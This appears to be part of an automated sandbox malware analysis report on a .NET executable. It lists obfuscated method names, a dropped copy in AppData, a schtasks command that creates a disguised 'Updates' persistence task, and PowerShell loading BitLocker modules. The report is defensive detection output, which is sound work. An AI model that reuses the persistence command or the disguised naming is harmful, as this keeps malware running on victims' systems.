Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs	.Net Code: HjCHRaqUBa System.Reflection.Assembly.Load(byte[])

Source: WIpGif4IRrFfamQ.exe

Static PE information: 0x89F24D9A [Mon May 4 13:16:10 2043 UTC]

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 0_2_0773AEF5 push FFFFFF8Bh; iretd	0_2_0773AEF7
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_013F9C30 push esp; retf 0141h	9_2_013F9D55
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 9_2_06B68A45 push es; ret	9_2_06B68A50
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 10_2_09019C3C push es; iretd	10_2_09019E02

Source: WIpGif4IRrFfamQ.exe	Static PE information: section name: .text entropy: 7.746536493454694
Source: AcEnrS.exe.0.dr	Static PE information: section name: .text entropy: 7.746536493454694

Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, knkxswQDEN8lBu51tk.cs	High entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, m1DVkKXr4gvOPA4nK0.cs	High entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, pQaNIlE0gJw8j7jxjk.cs	High entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, pGrnKxKrQR3D701DtL.cs	High entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, oNuyuTxvZibY8ioZKb.cs	High entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, ISavHrLyvlmGYFiOsh.cs	High entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	High entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, RpGIGn5mndsK4x9JE0.cs	High entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, Ueb4mVr79XybN88NZo.cs	High entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, KXdSrWMoC9DKnnUuBF.cs	High entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, R5of3UDxgNWEhs6P0j.cs	High entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, xD7wEtGCoU4fc01Xulr.cs	High entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, U35A56GnU8uQexd7HXb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, D6RRhpzZ6M1f14gDV6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, CGb0DBN599D0jgi7x9.cs	High entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, jjFS2HfKHwUO3B8t95.cs	High entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, KAPMOtSlEndQ0ODUr1.cs	High entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, VS1h38HfNhO9UdoG1S.cs	High entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
Source: 0.2.WIpGif4IRrFfamQ.exe.4af87b0.0.raw.unpack, YksRPt2hYeBck5nZ7U.cs	High entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, knkxswQDEN8lBu51tk.cs	High entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, m1DVkKXr4gvOPA4nK0.cs	High entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, pQaNIlE0gJw8j7jxjk.cs	High entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, pGrnKxKrQR3D701DtL.cs	High entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, oNuyuTxvZibY8ioZKb.cs	High entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, ISavHrLyvlmGYFiOsh.cs	High entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	High entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, RpGIGn5mndsK4x9JE0.cs	High entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, Ueb4mVr79XybN88NZo.cs	High entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, KXdSrWMoC9DKnnUuBF.cs	High entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, R5of3UDxgNWEhs6P0j.cs	High entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, xD7wEtGCoU4fc01Xulr.cs	High entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, U35A56GnU8uQexd7HXb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, D6RRhpzZ6M1f14gDV6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, CGb0DBN599D0jgi7x9.cs	High entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, jjFS2HfKHwUO3B8t95.cs	High entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, KAPMOtSlEndQ0ODUr1.cs	High entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, VS1h38HfNhO9UdoG1S.cs	High entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
Source: 0.2.WIpGif4IRrFfamQ.exe.4b7e7d0.2.raw.unpack, YksRPt2hYeBck5nZ7U.cs	High entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, knkxswQDEN8lBu51tk.cs	High entropy of concatenated method names: 'SytwbC5vQo', 'pvxwpfwaiw', 'URKw8kxNB2', 'frt8LQxXW6', 'WyX8zTFW0q', 'QLUwCJa1aY', 'odWwGlDZBS', 'w2fwSxu24Y', 'XJawn4F8Ql', 'jlxwHhZfoe'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, m1DVkKXr4gvOPA4nK0.cs	High entropy of concatenated method names: 'jkGOmuTm1Y', 'ey3OqOmZsO', 'FQTphyNqqU', 'KXjpTTq6l0', 'Gslpc4vxJ5', 'JsGpFFViyE', 'MVFpQo3RtD', 'dCWptPPOLn', 'O9ap50kIVn', 'PxipWDopA1'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, pQaNIlE0gJw8j7jxjk.cs	High entropy of concatenated method names: 'ToString', 'bnlye47g8q', 'TtKy9RbLfI', 'p2JyhXll6V', 'NqryTJL5w0', 'NTaycAW45m', 'w5ayFbNOnL', 'FEryQLERCW', 'aWZytYCovc', 'zvfy57un4o'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, pGrnKxKrQR3D701DtL.cs	High entropy of concatenated method names: 'PH4BxSm9f7', 'EyOBLLHriU', 't9osC9hBvd', 'qossGnGrVa', 'zhuBet2jb4', 'WxABir45Zi', 'B9cBNOjsup', 'f3qBfOH2Ea', 'I2eBYMxPae', 'Ke9BEhIPJx'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, oNuyuTxvZibY8ioZKb.cs	High entropy of concatenated method names: 'jrZsbNoBok', 'N20sDLrlSZ', 'QupspKSpNa', 'tpYsOy51V3', 'Lips8vsmi0', 'zTMswQ0OYK', 'fews2vrb7P', 'EMYs1kwxdx', 'aNXs3AxC6i', 'tijsIFWK88'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, ISavHrLyvlmGYFiOsh.cs	High entropy of concatenated method names: 'xZ07GGaxqG', 'jVM7nutSnZ', 'i6U7HiZIrN', 'wh57b1s5Tt', 'AEb7DBbejK', 't5Y7Od6H4P', 'oIS78YsHqS', 'v2tsZer1v0', 'zKLsxGm1Ra', 'wVDskhEmZv'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, XM8BCNlbKp5JEuAqSx.cs	High entropy of concatenated method names: 'wXnDfyVgrJ', 'jlxDYBSqHp', 'udSDEvhjBV', 'v4eDocYTCg', 'aqkDaxwrua', 'HnVDKXfFpS', 'XCFDZbErp3', 'qlRDxSj6PM', 'qT6DkN9sxF', 'V5VDLxlur7'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, RpGIGn5mndsK4x9JE0.cs	High entropy of concatenated method names: 'V25wuichNE', 'kdLw0ukfuV', 'aQBwRWrrOW', 'abBwVvK9Cq', 'QSWwm5V1LJ', 'Y30wPUFSFS', 'aM1wq3SZg2', 'z6WwlCvahN', 'K08wrflwPH', 'fkZwXGpNKC'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, Ueb4mVr79XybN88NZo.cs	High entropy of concatenated method names: 'jkCpVP3Y1N', 'cB4pPnDaZ4', 'P59pljuUyh', 'tVYprpd98O', 'l2bpAWcyoC', 'ImLpyV5jkS', 'SjgpBXqeyQ', 'TENpsfmVuV', 'H3Rp7xBe6l', 'PtwpUN4LLe'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, KXdSrWMoC9DKnnUuBF.cs	High entropy of concatenated method names: 'zpi8gJP41l', 'EwT8DYR7L7', 'sFT8On3sxj', 'MEJ8wFy8Bs', 'Tdu82jAP4d', 'FsWOaWNK3n', 'FRvOKn8Yex', 'E53OZtLDOc', 'oQYOxMtyU0', 'SqZOkqtcsB'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, R5of3UDxgNWEhs6P0j.cs	High entropy of concatenated method names: 'Dispose', 'riEGk2diQG', 'q2vS99Fljg', 'wHn88CM3YE', 'YANGLuyuTv', 'WibGzY8ioZ', 'ProcessDialogKey', 'VbnSCDVuZr', 'vn5SGMqCRL', 'FG9SSTSavH'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, xD7wEtGCoU4fc01Xulr.cs	High entropy of concatenated method names: 'UqJ7uM3FSF', 'kB470P49jK', 'q5v7RJQnUJ', 'ba77VP3w7O', 'eKF7mbfYwR', 'ljE7PVSJ9p', 'L1r7qBOQFr', 'dd47lI6IfQ', 'p4m7r0pWxh', 'Of07X8h4Vn'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, U35A56GnU8uQexd7HXb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DGpUf9kJvJ', 'o5HUYmwJIp', 'V5wUE34WqT', 'OVQUoBiVDe', 'WFkUaD0XDn', 'LSnUKUrqoF', 'M69UZZJ1Ax'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, D6RRhpzZ6M1f14gDV6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f5s74P3QWp', 'PXh7A0VmvP', 'nDd7yuvEu8', 'oUa7B51aIn', 'rri7sJQvaT', 'DV777QI4HU', 'Xae7UWsUlq'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, CGb0DBN599D0jgi7x9.cs	High entropy of concatenated method names: 'Nyf4lS6TU4', 'B5w4rupTQY', 'X814Mufpwu', 'deJ49BvXhR', 'NMI4TwjCBF', 'nmG4ctg7ih', 't7D4QIPSm5', 'DOL4tdtwxG', 'H3v4WaIqds', 'KSc4ePT6aB'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, jjFS2HfKHwUO3B8t95.cs	High entropy of concatenated method names: 'XkPAW9C8MT', 'x6UAiFCf7U', 'ldkAf7LXyO', 'otHAYrO61M', 'eVqA9RSddV', 'CxsAh3C50K', 'NTDATmy602', 'NeIAc3KXd4', 'xjXAFDeCXD', 'MRcAQhN4Ye'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, KAPMOtSlEndQ0ODUr1.cs	High entropy of concatenated method names: 'YoDRFDgQ6', 'GN3Vtgarh', 'XCFPy36xT', 'Vgnq6GsEO', 'T6CrJwcqM', 'bYNXimDWU', 'OAAWnmYILWZFNbxf5n', 'QLCVh9FamrOIOanLMg', 'qlZQEGD8qwsZhXt8ES', 'LLPsFf8ac'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, VS1h38HfNhO9UdoG1S.cs	High entropy of concatenated method names: 'UixGwM8BCN', 'fKpG25JEuA', 'A79G3XybN8', 'iNZGIoI1DV', 'o4nGAK0QXd', 'crWGyoC9DK', 'AMSlT9BgkYOHPOKYM5', 'GRatstSZ84yLVAo1Re', 'zLDGGLxpOM', 'UsaGnNQT1r'
Source: 0.2.WIpGif4IRrFfamQ.exe.a250000.7.raw.unpack, YksRPt2hYeBck5nZ7U.cs	High entropy of concatenated method names: 'uOZngLABEK', 't1lnbCAtTo', 'IlSnDqmPVE', 'IwfnpbqJEN', 'C0dnOxFaOO', 'elVn8QCFue', 'KRDnw4W18w', 'v6On2uFS9V', 'P25n1ReofT', 'aYcn3lPxKk'

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

File created: C:\Users\user\AppData\Roaming\AcEnrS.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
